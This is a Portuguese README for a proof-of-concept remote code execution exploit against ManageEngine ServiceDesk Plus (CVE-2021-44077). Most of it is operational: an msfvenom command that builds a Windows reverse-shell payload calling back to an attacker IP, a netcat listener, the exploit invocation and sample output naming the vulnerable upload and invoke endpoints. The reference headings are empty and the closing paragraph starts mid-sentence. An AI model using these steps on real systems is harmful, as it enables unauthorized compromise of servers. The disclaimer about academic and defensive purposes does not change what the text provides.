
Exploit de prova de conceito para RCE PreAuth no ManageEngine ServiceDesk Plus (CVE-2021-44077). Faz upload e executa executáveis Windows arbitrários em alvos vulneráveis.
Exploit de Prova de Conceito para CVE-2021-44077: PreAuth RCE no ManageEngine ServiceDesk Plus < 11306
Baseado em:
Aviso da CISA:
Remediação (Atualize para a build 11306 ou posterior):
Testado no ManageEngine ServiceDesk Plus Build 11303. AV desabilitado.
O exploit faz upload de um executável Windows para o alvo e o executa.
Para explorar, primeiro gere qualquer executável. Por exemplo:
msfvenom -p windows/shell_reverse_tcp LHOST=192.168.0.140 LPORT=4444 -f exe > msiexec.exe
Faça pip install do arquivo de requisitos ou certifique-se de ter o pacote requests.
Se você está tentando capturar um reverse shell, execute seu listener primeiro, por exemplo:
nc -l 4444
Então execute o script do exploit, passando os argumentos url e exe, por exemplo:
python exploit.py http://<TARGET>:<PORT> <path_to_exe>
Exemplo de saída do script:
% python exploit.py http://192.168.0.140:8080 msiexec.exe
[+] Target: http://192.168.0.140:8080/
[+] Executable: msiexec.exe
[+] Uploading msiexec.exe to http://192.168.0.140:8080/RestAPI/ImportTechnicians?step=1
[+] Got 401 error code on upload. This is expected.
[+] Uploaded msiexec.exe
[+] Attempting to invoke against url http://192.168.0.140:8080/./RestAPI/s247action. Waiting up to 20 seconds...
[+] Done, did it work?

bin da instalação, incluindo arquivos existentes, como scripts batch. Pode haver outras formas de invocar o arquivo carregado.Este software foi criado puramente para fins de pesquisa acadêmica e para o desenvolvimento de técnicas defensivas eficazes, e não se destina a ser usado para atacar sistemas, exceto quando explicitamente autorizado. Os mantenedores do projeto não são responsáveis pelo uso indevido do software. Use com responsabilidade.